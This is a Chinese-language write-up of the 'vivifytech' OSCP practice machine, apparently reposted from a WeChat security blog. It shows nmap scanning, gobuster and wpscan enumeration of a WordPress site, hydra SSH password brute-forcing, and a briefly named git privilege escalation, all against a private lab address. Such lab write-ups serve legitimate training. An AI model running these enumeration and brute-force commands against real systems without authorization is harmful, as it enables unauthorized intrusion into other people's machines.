OSCP 靶场
靶场介绍
|
vivifytech |
easy |
常规信息收集、wordpress利用、ssh爆破、主机信息收集、git 提权 |
信息收集
主机发现
nmap -sn 192.168.31.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.107
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 22:57 EST
Nmap scan report for 192.168.31.107
Host is up (0.0011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000目录扫描
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.107 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.107
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.107/.php (Status: 403) [Size: 279]
http://192.168.31.107/index.html (Status: 200) [Size: 10701]
http://192.168.31.107/.html (Status: 403) [Size: 279]
http://192.168.31.107/wordpress (Status: 301) [Size: 320] [--> http://192.168.31.107/wordpress/]
http://192.168.31.107/.html (Status: 403) [Size: 279]
http://192.168.31.107/.php (Status: 403) [Size: 279]
http://192.168.31.107/server-status (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.107/wordpress -x php,html,txt -e
这里找到一个字典文件
漏洞扫描
wpscan --url http://192.168.31.107/wordpress -e
权限获取
爆破wp后台失败
wpscan --url http://192.168.31.107/wordpress/wp-login.php -U sancelisso -P pass.txt
爆破ssh失败
重新从如下页面从找到几个名字进行爆破
http://192.168.31.107/wordpress/index.php/2023/12/05/the-story-behind-vivifytech/
hydra -L user.txt -P pass.txt ssh://192.168.31.107
权限提升
sarah 目录下找到gbodja 用户的账号密码
利用git 提权到root 权限
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】vivifytech
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论